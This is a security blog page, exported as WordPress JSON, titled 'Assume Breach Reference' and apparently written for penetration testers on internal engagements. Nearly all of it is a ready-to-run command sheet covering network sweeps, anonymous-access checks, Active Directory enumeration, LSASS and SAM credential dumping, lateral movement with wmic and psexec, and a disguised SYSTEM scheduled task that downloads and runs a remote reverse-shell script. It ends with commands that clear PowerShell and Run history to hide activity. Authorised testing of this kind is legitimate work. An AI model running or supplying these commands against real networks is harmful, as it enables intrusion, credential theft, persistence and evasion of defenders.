{"id":725,"date":"2025-05-17T18:22:26","date_gmt":"2025-05-17T18:22:26","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=725"},"modified":"2025-05-19T20:15:59","modified_gmt":"2025-05-19T20:15:59","slug":"assume-breach-reference","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/assume-breach-reference\/","title":{"rendered":"Assume Breach Reference"},"content":{"rendered":"\n<div class=\"wp-block-cover aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-729 size-full\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/05\/assume-breach-1.png\" data-object-fit=\"cover\"\/><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\" style=\"background-color:#5d8075\"><\/span><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">Assume Breach<\/p>\n\n\n\n<p class=\"has-white-color has-text-color has-link-color has-medium-font-size wp-elements-c122690bf6cb955678aa22627c8dd9aa\"><br><br><br><em>Perimeter is a myth. <\/em><br><br><mark data-darkreader-inline-bgcolor=\"\" style=\"background-color: rgba(0, 0, 0, 0); --darkreader-inline-bgcolor: var(--darkreader-background-00000000, rgba(0, 0, 0, 0));\" class=\"has-inline-color has-vivid-red-color\">-S1REN<\/mark><\/p>\n<\/div><\/div>\n\n\n\n<p id=\"assume-breach-reference\">Doing an internal and need an assume breach reference? This is your guide.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># <strong><em>ASSUME BREACH REFERENCE<\/em><\/strong>\n############################################\n# 1  <strong>NETWORK DISCOVERY<\/strong>                     #\n############################################\n<strong># PING SWEEP?<\/strong>  (edit subnet)               \nnmap -sn 10.0.0.0\/24 -oG ping_sweep\n\n<strong># EXTRACT LIVE IPS?<\/strong> (\u2192 online)\n<strong>#NOTE:<\/strong> Not ALL of these will always be real online machines. Some will be bogus ICMP returns...it just happens sometimes. Gather the local domain from the internal and grep for that in addition to any returned MAC Addresses. Basically, this is a situational thing when getting your actual \"<strong>online<\/strong>\" flat-file. \n<strong>In bash terms:<\/strong> |grep -iE 'mac|&lt;domain>.local' -B2 |grep -oE '((1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])\\.){3}(1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])' |sort -u > <strong>online<\/strong>\n<strong>In basic terms:<\/strong>            \ncat ping_sweep |grep -oE '((1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])\\.){3}(1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])' | sort -u > <strong>online<\/strong>\n\n<strong># TOP\u2011100 PORT SCAN?     <\/strong>                  \nfor ip in $(cat <strong>online<\/strong>); do nmap -sS -Pn --top-ports 100 -oA \"quick_$ip\" \"$ip\"; done\n\n<strong># FULL TCP (optional)? <\/strong>                    \nsudo nmap -sS -p- -T4 -iL <strong>online <\/strong>-oA full_scan\n\n############################################\n# 1A  <strong>NULL \/ ANON AUTH CHECKS <\/strong>             #\n############################################\n<strong># SMB NULL SESSION? <\/strong> (\u2192 smb_null.txt)      \nfor ip in $(cat <strong>online<\/strong>); do smbclient -L \"\/\/$ip\/\" -N -g >\/dev\/null 2>&amp;1 &amp;&amp; echo $ip; done | tee smb_null.txt\n\n<strong># RPC NULL INFO? <\/strong> (\u2192 rpc_null.txt)         \nfor ip in $(cat <strong>online<\/strong>); do rpcclient -U \"\" -N \"$ip\" -c info 2>&amp;1 | grep -q 'Domain' &amp;&amp; echo $ip; done | tee rpc_null.txt\n\n<strong># LDAP ANON BIND?<\/strong>  (\u2192 ldap_anon.txt)       \nfor ip in $(cat <strong>online<\/strong>); do ldapsearch -x -H \"ldap:\/\/$ip\" -s base -b \"\" -o nettimeout=3 \"(objectclass=*)\" 2>\/dev\/null | head -n1 | grep -q \"namingContexts\" &amp;&amp; echo $ip; done | tee ldap_anon.txt\n\n<strong># NFS EXPORTS?<\/strong>  (\u2192 nfs_exports.txt)        \nfor ip in $(cat <strong>online<\/strong>); do showmount -e \"$ip\" 2>\/dev\/null | grep -q \"export list\" &amp;&amp; echo $ip; done | tee nfs_exports.txt\n\n<strong># SNMP PUBLIC STRING?<\/strong>  (\u2192 snmp_public.txt) \nfor ip in $(cat <strong>online<\/strong>); do snmpwalk -v2c -c public -t1 -r0 \"$ip\" 1.3.6.1.2.1.1.1.0 2>\/dev\/null | grep -q \"DESCRIPTION\" &amp;&amp; echo $ip; done | tee snmp_public.txt\n\n<strong># FTP ANON LOGIN?<\/strong>  (\u2192 ftp_anon.txt)        \nfor ip in $(cat <strong>online<\/strong>); do nmap -p21 --script ftp-anon -Pn \"$ip\" 2>\/dev\/null | grep -q \"Anonymous FTP login allowed\" &amp;&amp; echo $ip; done | tee ftp_anon.txt\n\n############################################\n# 1B  <strong>NETEXEC &amp; KERBRUTE ENUM<\/strong>              #\n############################################\n# <strong>NETEXEC SMB SHARE ENUM?<\/strong>  (\u2192 ne_smb.txt)\nnetexec smb <strong>online <\/strong>-u '' -p '' --shares | tee ne_smb.txt\n\n# <strong>NETEXEC SMB GUEST ENUM?<\/strong> (\u2192 ne_smb_guest.txt)\nnetexec smb <strong>online <\/strong>-u \"guest\" -p \"\" --shares |tee ne_smb_guest.txt\n\n# <strong>NETEXEC LDAP ENUM?<\/strong>  (\u2192 ne_ldap.txt)      \nnetexec ldap <strong>online <\/strong>-u '' -p '' -M enum |tee ne_ldap.txt\n\n# <strong>NETEXEC WINRM ENUM?<\/strong> (\u2192 ne_winrm.txt)     \nnetexec winrm <strong>online <\/strong>-u '' -p '' --exec whoami |tee ne_winrm.txt\n\n# <strong>NETEXEC MSSQL INFO?<\/strong> (\u2192 ne_mssql.txt)     \nnetexec mssql <strong>online <\/strong>-u '' -p '' |tee ne_mssql.txt\n\n# <strong>KERBRUTE USER ENUM?<\/strong> (\u2192 kerbrute_valid.txt)\nkerbrute userenum --dc &lt;dc_ip> -d &lt;domain> users.txt 2>\/dev\/null |tee kerbrute_valid.txt\n\n############################################\n# 2  <strong>CREDENTIAL DUMPING<\/strong>                    #\n############################################\n# <strong>LSASS MINIDUMP?<\/strong>                           \nrundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll,MiniDump $(pidof lsass.exe) lsass.dmp full\n\n# <strong>SAM+SYSTEM HIVES?<\/strong>                         \nreg save HKLM\\SAM sam.save &amp; reg save HKLM\\SYSTEM system.save\n\n# <strong>PARSE SECRETS?<\/strong>                            \nsecretsdump.py -sam sam.save -system system.save LOCAL > hashed.txt\n\n############################################\n# 3  <strong>LATERAL MOVEMENT<\/strong>                      #\n############################################\n# <strong>PS REMOTING?<\/strong>                              \nEnter-PSSession -ComputerName &lt;host> -Credential &lt;dom\\\\user>\n\n# <strong>WMI EXEC?<\/strong>                                 \nwmic \/node:&lt;host> process call create \"cmd \/c powershell -c &lt;payload>\"\n\n# <strong>SMB PSEXEC?<\/strong>                               \npsexec.py &lt;dom>\/&lt;user>:&lt;pass>@&lt;host>\n\n############################################\n# 4  <strong>PERSISTENCE<\/strong>                           #\n############################################\n# <strong>SYSTEM SCHEDULED TASK?<\/strong>                    \nschtasks \/create \/ru SYSTEM \/sc ONSTART \/tn WinUpdate \/tr \"powershell -ep bypass -c iex((New-Object Net.WebClient).DownloadString('http:\/\/&lt;ip>\/rev.ps1'))\"\n\n# <strong>WMI EVENT SUB BACKDOOR?<\/strong>                   \npowershell -c \"Invoke-WmiMethod -Namespace root\\subscription ...\"\n\n############################################\n# 5  <strong>CLEAN-UP \/ COVER TRACKS<\/strong>               #\n############################################\n# <strong>CLEAR POWERSHELL HISTORY?<\/strong>                 \nRemove-Item (Get-PSReadlineOption).HistorySavePath\n\n# <strong>CLEAR CMD RUNMRU?<\/strong>                         \nreg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU \/f\n########################################################\n<em>Happy Hacking, Intruder.<\/em>\n-S1REN\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"No Man\u2019s Sky - EOTWS Variation1\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/Znq03ZdBdZs?start=202&feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Doing an internal and need an assume breach reference? This is your guide.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-725","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=725"}],"version-history":[{"count":13,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725\/revisions"}],"predecessor-version":[{"id":762,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725\/revisions\/762"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}